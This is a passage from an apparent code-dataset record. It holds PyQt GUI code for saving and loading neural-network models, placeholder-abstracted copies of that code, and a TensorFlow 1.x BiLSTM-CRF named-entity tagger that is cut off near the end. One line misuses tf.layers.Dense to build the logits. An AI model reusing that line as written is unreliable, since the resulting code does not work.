= QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.\n combineNumConv, self.convCoreNum, self.\n combineNumPooling)\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n <function token>\n <function token>\n\n\n<code token>\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n <function token>\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n <function token>\n <function token>\n <function token>\n\n\n<code token>\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n <function token>\n <function token>\n <function token>\n\n\n<code token>\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<code token>\n", "<import token>\n<class token>\n<code token>\n" ]
false
10
5d9c8e235385ff53c7510994826ff3a04e4a5888
""" @file : 001-rnn+lstm+crf.py @author: xiaolu @time : 2019-09-06 """ import re import numpy as np import tensorflow as tf from sklearn.metrics import classification_report class Model: def __init__(self, dim_word, dim_char, dropout, learning_rate, hidden_size_char, hidden_size_word, num_layers): ''' :param dim_word: 词的维度 :param dim_char: 字符维度 :param dropout: dropout :param learning_rate: 学习率 :param hidden_size_char: 字符隐层输出维度 :param hidden_size_word: 词隐层输出维度 :param num_layers: 几层 ''' def cells(size, reuse=False): return tf.contrib.rnn.DropoutWrapper( tf.nn.rnn_cell.LSTMCell(size, initializer=tf.orthogonal_initializer(), reuse=reuse), output_keep_prob=dropout ) # 1. define input self.word_ids = tf.placeholder(tf.int32, shape=[None, None]) self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None]) self.labels = tf.placeholder(tf.int32, shape=[None, None]) self.maxlen = tf.shape(self.word_ids)[1] self.lengths = tf.count_nonzero(self.word_ids, 1) # 2. embedding self.word_embeddings = tf.Variable(tf.truncated_normal([len(word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word))) self.char_embeddings = tf.Variable(tf.truncated_normal([len(char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char))) word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.word_ids) char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.char_ids) s = tf.shape(char_embedded) # (51312, 50, 27, embedding_size) char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2], dim_char]) for n in range(num_layers): (out_fw, out_bw), (state_fw, state_bw) = tf.nn.bidirectional_dynamic_rnn( cell_fw=cells(hidden_size_char), cell_bw=cells(hidden_size_char), inputs=char_embedded, dtype=tf.float32, scope='bidirectional_rnn_char_%d' % n ) char_embedded = tf.concat((out_fw, out_bw), 2) output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2*hidden_size_char]) word_embedded = tf.concat([word_embedded, output], axis=-1) # 将词嵌入部分与字符嵌入通过双向lstm输出部分进行拼接 for n in range(num_layers): (out_fw, out_bw), (state_fw, state_bw) = tf.nn.bidirectional_dynamic_rnn( cell_fw=cells(hidden_size_word), cell_bw=cells(hidden_size_word), inputs=word_embedded, dtype=tf.float32, scope='bidirectional_rnn_word_%d' % n ) word_embedded = tf.concat((out_fw, out_bw), 2) logits = tf.layers.Dense(word_embedded, len(idx2tag)) y_t = self.labels log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood( logits, y_t, self.lengths ) self.cost = tf.reduce_mean(-log_likelihood) self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(self.cost) mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen) self.tags_seq, tags_score = tf.contrib.crf.crf_decode( logits, transition_params, self.lengths ) self.tags_seq = tf.identity(self.tags_seq, name='logits') y_t = tf.cast(y_t, tf.int32) self.prediction = tf.boolean_mask(self.tags_seq, mask) mask_label = tf.boolean_mask(y_t, mask) correct_pred = tf.equal(self.prediction, mask_label) correct_index = tf.cast(correct_pred, tf.float32) self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32)) def parse(file): ''' 加载文件并且解析 :param file: 文件名 :return: 词<->词性 ''' with open(file) as fopen: texts = fopen.read().split('\n') left, right = [], [] for text in texts: if '-DOCSTART' in text or not len(text): continue splitted = text.split() left.append(splitted[0]) right.append(splitted[-1]) return left, right def process_string(string): ''' :param string: :return: ''' string= re.sub('[^A-Za-z0-9\-\/ ]+', ' ', string).split() return ' '.join([to_title(y.strip()) for y in string]) def to_title(string): if string.isupper(): string = string.title() return string def parse_XY(texts, labels): ''' 整理词性表  词表  字符表  并将文本转为对应的数字序列 :param texts: 文本 词的一个列表 :param labels: 词性的一个列表 :return: 词转为id的序列 词性转为id的序列 ''' global word2idx, tag2idx, char2idx, word_idx, tag_idx, char_idx X, Y = [], [] for no, text in enumerate(texts): text = text.lower() # 当前这个单词转小写 tag = labels[no] # 取出对应的词性 for c in text: # 字符表 if c not in char2idx: char2idx[c] = char_idx char_idx += 1 if tag not in tag2idx: # 词性表 tag2idx[tag] = tag_idx tag_idx += 1 Y.append(tag2idx[tag]) # 当前这个词的词性转为id的值 if text not in word2idx: # 词表 word2idx[text] = word_idx word_idx += 1 X.append(word2idx[text]) # 将词转为id的标号 return X, np.array(Y) def iter_seq(x): return np.array([x[i: i+seq_len] for i in range(0, len(x)-seq_len, 1)]) def to_train_seq(*args): ''' :param args: 词转为的id的序列   词性转为id的序列 :return: ''' return [iter_seq(x) for x in args] def generate_char_seq(batch): ''' 传进来是50一个块 总共有多少块 然后将每块的单词转为字符序列 :param batch: :return: ''' x = [[len(idx2word[i]) for i in k] for k in batch] # 得出每个单词的长度 maxlen = max([j for i in x for j in i]) # 最大长度 temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32) for i in range(batch.shape[0]): for k in range(batch.shape[1]): for no, c in enumerate(idx2word[batch[i, k]]): temp[i, k, -1-no] = char2idx[c] return temp # [文章数, 单词个数, maxlen(每个单词按字符转的id)] def pred2label(pred): # 将预测结果转为标签 out = [] for pred_i in pred: out_i = [] for p in pred_i: out_i.append(idx2tag[p]) out.append(out_i) return out if __name__ == '__main__': left_train, right_train = parse('./data/eng.train') left_test, right_test = parse('./data/eng.testa') # print(left_train[:10]) # print(right_train[:10]) word2idx = {'PAD': 0, 'NUM': 1, 'UNK': 2} # 词表 tag2idx = {'PAD': 0} # 词性表 char2idx = {'PAD': 0} word_idx = 3 tag_idx = 1 char_idx = 1 train_X, train_Y = parse_XY(left_train, right_train) test_X, test_Y = parse_XY(left_test, right_test) # print(train_X[:20]) # print(train_Y[:20]) idx2word = {idx: tag for tag, idx in word2idx.items()} idx2tag = {i: w for w, i in tag2idx.items()} seq_len = 50 X_seq, Y_seq = to_train_seq(train_X, train_Y) # 长度为50为一个段落 X_char_seq = generate_char_seq(X_seq) print(X_seq.shape) # (203571, 50) print(X_char_seq.shape) # (203571, 50, 61) X_seq_test, Y_seq_test = to_train_seq(test_X, test_Y) X_char_seq_test = generate_char_seq(X_seq_test) print(X_seq_test.shape) # (51312, 50) print(X_char_seq_test.shape) # (51312, 50, 27) train_X, train_Y, train_char = X_seq, Y_seq, X_char_seq test_X, test_Y, test_char = X_seq_test, Y_seq_test, X_char_seq_test tf.reset_default_graph() sess = tf.Session() dim_word = 64 dim_char = 128 dropout = 0.8 learning_rate = 1e-3 hidden_size_char = 128 hidden_size_word = 128 num_layers = 2 batch_size = 32 model = Model(dim_word, dim_char, dropout, learning_rate, hidden_size_char, hidden_size_word, num_layers) sess.run(tf.global_variables_initializer()) for e in range(3): train_acc, train_loss, test_acc, test_loss = 0, 0, 0, 0 for i in range(0, len(train_X), batch_size): batch_x = train_X[i: min(i + batch_size, train_X.shape[0])] batch_char = train_char[i: min(i + batch_size, train_X.shape[0])] batch_y = train_Y[i: min(i + batch_size, train_X.shape[0])] acc, cost, _ = sess.run( [model.accuracy, model.cost, model.optimizer], feed_dict={ model.word_ids: batch_x, model.char_ids: batch_char, model.labels: batch_y }, ) train_loss += cost train_acc += acc print('train_data: epoch:{}, step:{}, loss:{}, accuracy:{}'.format(e, i//batch_size+1, cost, acc)) for i in range(0, len(test_X), batch_size): batch_x = test_X[i: min(i + batch_size, test_X.shape[0])] batch_char = test_char[i: min(i + batch_size, test_X.shape[0])] batch_y = test_Y[i: min(i + batch_size, test_X.shape[0])] acc, cost = sess.run( [model.accuracy, model.cost], feed_dict={ model.word_ids: batch_x, model.char_ids: batch_char, model.labels: batch_y }, ) test_loss += cost test_acc += acc print('test_data: epoch:{}, step:{}, loss:{}, accuracy:{}'.format(e, i//batch_size+1, cost, acc)) train_loss /= len(train_X) / batch_size train_acc /= len(train_X) / batch_size test_loss /= len(test_X) / batch_size test_acc /= len(test_X) / batch_size print('epoch: %d, training loss: %f, training acc: %f, valid loss: %f, valid acc: %f\n' % (e, train_loss, train_acc, test_loss, test_acc)) real_Y, predict_Y = [], [] for i in range(0, len(test_X), batch_size): batch_x = test_X[i: min(i + batch_size, test_X.shape[0])] batch_char = test_char[i: min(i + batch_size, test_X.shape[0])] batch_y = test_Y[i: min(i + batch_size, test_X.shape[0])] predicted = pred2label( sess.run(model.tags_seq, feed_dict={ model.word_ids: batch_x, model.char_ids: batch_char, }, ) ) real = pred2label(batch_y) predict_Y.extend(predicted) real_Y.extend(real) print(classification_report(np.array(real_Y).ravel(), np.array(predict_Y).ravel()))
[ "\"\"\"\n\n@file : 001-rnn+lstm+crf.py\n\n@author: xiaolu\n\n@time : 2019-09-06\n\n\"\"\"\nimport re\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.metrics import classification_report\n\n\nclass Model:\n def __init__(self, dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers):\n '''\n :param dim_word: 词的维度\n :param dim_char: 字符维度\n :param dropout: dropout\n :param learning_rate: 学习率\n :param hidden_size_char: 字符隐层输出维度\n :param hidden_size_word: 词隐层输出维度\n :param num_layers: 几层\n '''\n def cells(size, reuse=False):\n return tf.contrib.rnn.DropoutWrapper(\n tf.nn.rnn_cell.LSTMCell(size, initializer=tf.orthogonal_initializer(), reuse=reuse),\n output_keep_prob=dropout\n )\n\n # 1. define input\n self.word_ids = tf.placeholder(tf.int32, shape=[None, None])\n self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])\n self.labels = tf.placeholder(tf.int32, shape=[None, None])\n self.maxlen = tf.shape(self.word_ids)[1]\n self.lengths = tf.count_nonzero(self.word_ids, 1)\n\n # 2. embedding\n self.word_embeddings = tf.Variable(tf.truncated_normal([len(word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))\n self.char_embeddings = tf.Variable(tf.truncated_normal([len(char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))\n word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.word_ids)\n char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.char_ids)\n\n s = tf.shape(char_embedded) # (51312, 50, 27, embedding_size)\n char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2], dim_char])\n\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw) = tf.nn.bidirectional_dynamic_rnn(\n cell_fw=cells(hidden_size_char),\n cell_bw=cells(hidden_size_char),\n inputs=char_embedded,\n dtype=tf.float32,\n scope='bidirectional_rnn_char_%d' % n\n )\n char_embedded = tf.concat((out_fw, out_bw), 2)\n\n output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2*hidden_size_char])\n word_embedded = tf.concat([word_embedded, output], axis=-1) # 将词嵌入部分与字符嵌入通过双向lstm输出部分进行拼接\n\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw) = tf.nn.bidirectional_dynamic_rnn(\n cell_fw=cells(hidden_size_word),\n cell_bw=cells(hidden_size_word),\n inputs=word_embedded,\n dtype=tf.float32,\n scope='bidirectional_rnn_word_%d' % n\n )\n word_embedded = tf.concat((out_fw, out_bw), 2)\n\n logits = tf.layers.Dense(word_embedded, len(idx2tag))\n\n y_t = self.labels\n log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(\n logits, y_t, self.lengths\n )\n\n self.cost = tf.reduce_mean(-log_likelihood)\n self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(self.cost)\n mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)\n\n self.tags_seq, tags_score = tf.contrib.crf.crf_decode(\n logits, transition_params, self.lengths\n )\n\n self.tags_seq = tf.identity(self.tags_seq, name='logits')\n\n y_t = tf.cast(y_t, tf.int32)\n\n self.prediction = tf.boolean_mask(self.tags_seq, mask)\n mask_label = tf.boolean_mask(y_t, mask)\n\n correct_pred = tf.equal(self.prediction, mask_label)\n correct_index = tf.cast(correct_pred, tf.float32)\n self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\ndef parse(file):\n '''\n 加载文件并且解析\n :param file: 文件名\n :return: 词<->词性\n '''\n with open(file) as fopen:\n texts = fopen.read().split('\\n')\n\n left, right = [], []\n for text in texts:\n if '-DOCSTART' in text or not len(text):\n continue\n splitted = text.split()\n left.append(splitted[0])\n right.append(splitted[-1])\n return left, right\n\n\ndef process_string(string):\n '''\n :param string:\n :return:\n '''\n string= re.sub('[^A-Za-z0-9\\-\\/ ]+', ' ', string).split()\n return ' '.join([to_title(y.strip()) for y in string])\n\n\ndef to_title(string):\n if string.isupper():\n string = string.title()\n return string\n\n\ndef parse_XY(texts, labels):\n '''\n 整理词性表  词表  字符表  并将文本转为对应的数字序列\n :param texts: 文本 词的一个列表\n :param labels: 词性的一个列表\n :return: 词转为id的序列 词性转为id的序列\n '''\n global word2idx, tag2idx, char2idx, word_idx, tag_idx, char_idx\n X, Y = [], []\n for no, text in enumerate(texts):\n text = text.lower() # 当前这个单词转小写\n tag = labels[no] # 取出对应的词性\n for c in text: # 字符表\n if c not in char2idx:\n char2idx[c] = char_idx\n char_idx += 1\n if tag not in tag2idx: # 词性表\n tag2idx[tag] = tag_idx\n tag_idx += 1\n Y.append(tag2idx[tag]) # 当前这个词的词性转为id的值\n if text not in word2idx: # 词表\n word2idx[text] = word_idx\n word_idx += 1\n X.append(word2idx[text]) # 将词转为id的标号\n return X, np.array(Y)\n\n\ndef iter_seq(x):\n return np.array([x[i: i+seq_len] for i in range(0, len(x)-seq_len, 1)])\n\n\ndef to_train_seq(*args):\n '''\n :param args: 词转为的id的序列   词性转为id的序列\n :return:\n '''\n return [iter_seq(x) for x in args]\n\n\ndef generate_char_seq(batch):\n '''\n 传进来是50一个块 总共有多少块\n 然后将每块的单词转为字符序列\n :param batch:\n :return:\n '''\n x = [[len(idx2word[i]) for i in k] for k in batch] # 得出每个单词的长度\n maxlen = max([j for i in x for j in i]) # 最大长度\n temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)\n\n for i in range(batch.shape[0]):\n for k in range(batch.shape[1]):\n for no, c in enumerate(idx2word[batch[i, k]]):\n temp[i, k, -1-no] = char2idx[c]\n return temp # [文章数, 单词个数, maxlen(每个单词按字符转的id)]\n\n\ndef pred2label(pred):\n # 将预测结果转为标签\n out = []\n for pred_i in pred:\n out_i = []\n for p in pred_i:\n out_i.append(idx2tag[p])\n out.append(out_i)\n return out\n\n\nif __name__ == '__main__':\n left_train, right_train = parse('./data/eng.train')\n left_test, right_test = parse('./data/eng.testa')\n # print(left_train[:10])\n # print(right_train[:10])\n\n word2idx = {'PAD': 0, 'NUM': 1, 'UNK': 2} # 词表\n tag2idx = {'PAD': 0} # 词性表\n char2idx = {'PAD': 0}\n word_idx = 3\n tag_idx = 1\n char_idx = 1\n\n train_X, train_Y = parse_XY(left_train, right_train)\n test_X, test_Y = parse_XY(left_test, right_test)\n # print(train_X[:20])\n # print(train_Y[:20])\n\n idx2word = {idx: tag for tag, idx in word2idx.items()}\n idx2tag = {i: w for w, i in tag2idx.items()}\n\n seq_len = 50\n\n X_seq, Y_seq = to_train_seq(train_X, train_Y) # 长度为50为一个段落\n X_char_seq = generate_char_seq(X_seq)\n print(X_seq.shape) # (203571, 50)\n print(X_char_seq.shape) # (203571, 50, 61)\n\n X_seq_test, Y_seq_test = to_train_seq(test_X, test_Y)\n X_char_seq_test = generate_char_seq(X_seq_test)\n print(X_seq_test.shape) # (51312, 50)\n print(X_char_seq_test.shape) # (51312, 50, 27)\n\n train_X, train_Y, train_char = X_seq, Y_seq, X_char_seq\n test_X, test_Y, test_char = X_seq_test, Y_seq_test, X_char_seq_test\n\n tf.reset_default_graph()\n sess = tf.Session()\n\n dim_word = 64\n dim_char = 128\n dropout = 0.8\n learning_rate = 1e-3\n hidden_size_char = 128\n hidden_size_word = 128\n num_layers = 2\n batch_size = 32\n\n model = Model(dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers)\n sess.run(tf.global_variables_initializer())\n\n for e in range(3):\n train_acc, train_loss, test_acc, test_loss = 0, 0, 0, 0\n for i in range(0, len(train_X), batch_size):\n\n batch_x = train_X[i: min(i + batch_size, train_X.shape[0])]\n batch_char = train_char[i: min(i + batch_size, train_X.shape[0])]\n batch_y = train_Y[i: min(i + batch_size, train_X.shape[0])]\n\n acc, cost, _ = sess.run(\n [model.accuracy, model.cost, model.optimizer],\n feed_dict={\n model.word_ids: batch_x,\n model.char_ids: batch_char,\n model.labels: batch_y\n },\n )\n train_loss += cost\n train_acc += acc\n print('train_data: epoch:{}, step:{}, loss:{}, accuracy:{}'.format(e, i//batch_size+1, cost, acc))\n\n for i in range(0, len(test_X), batch_size):\n 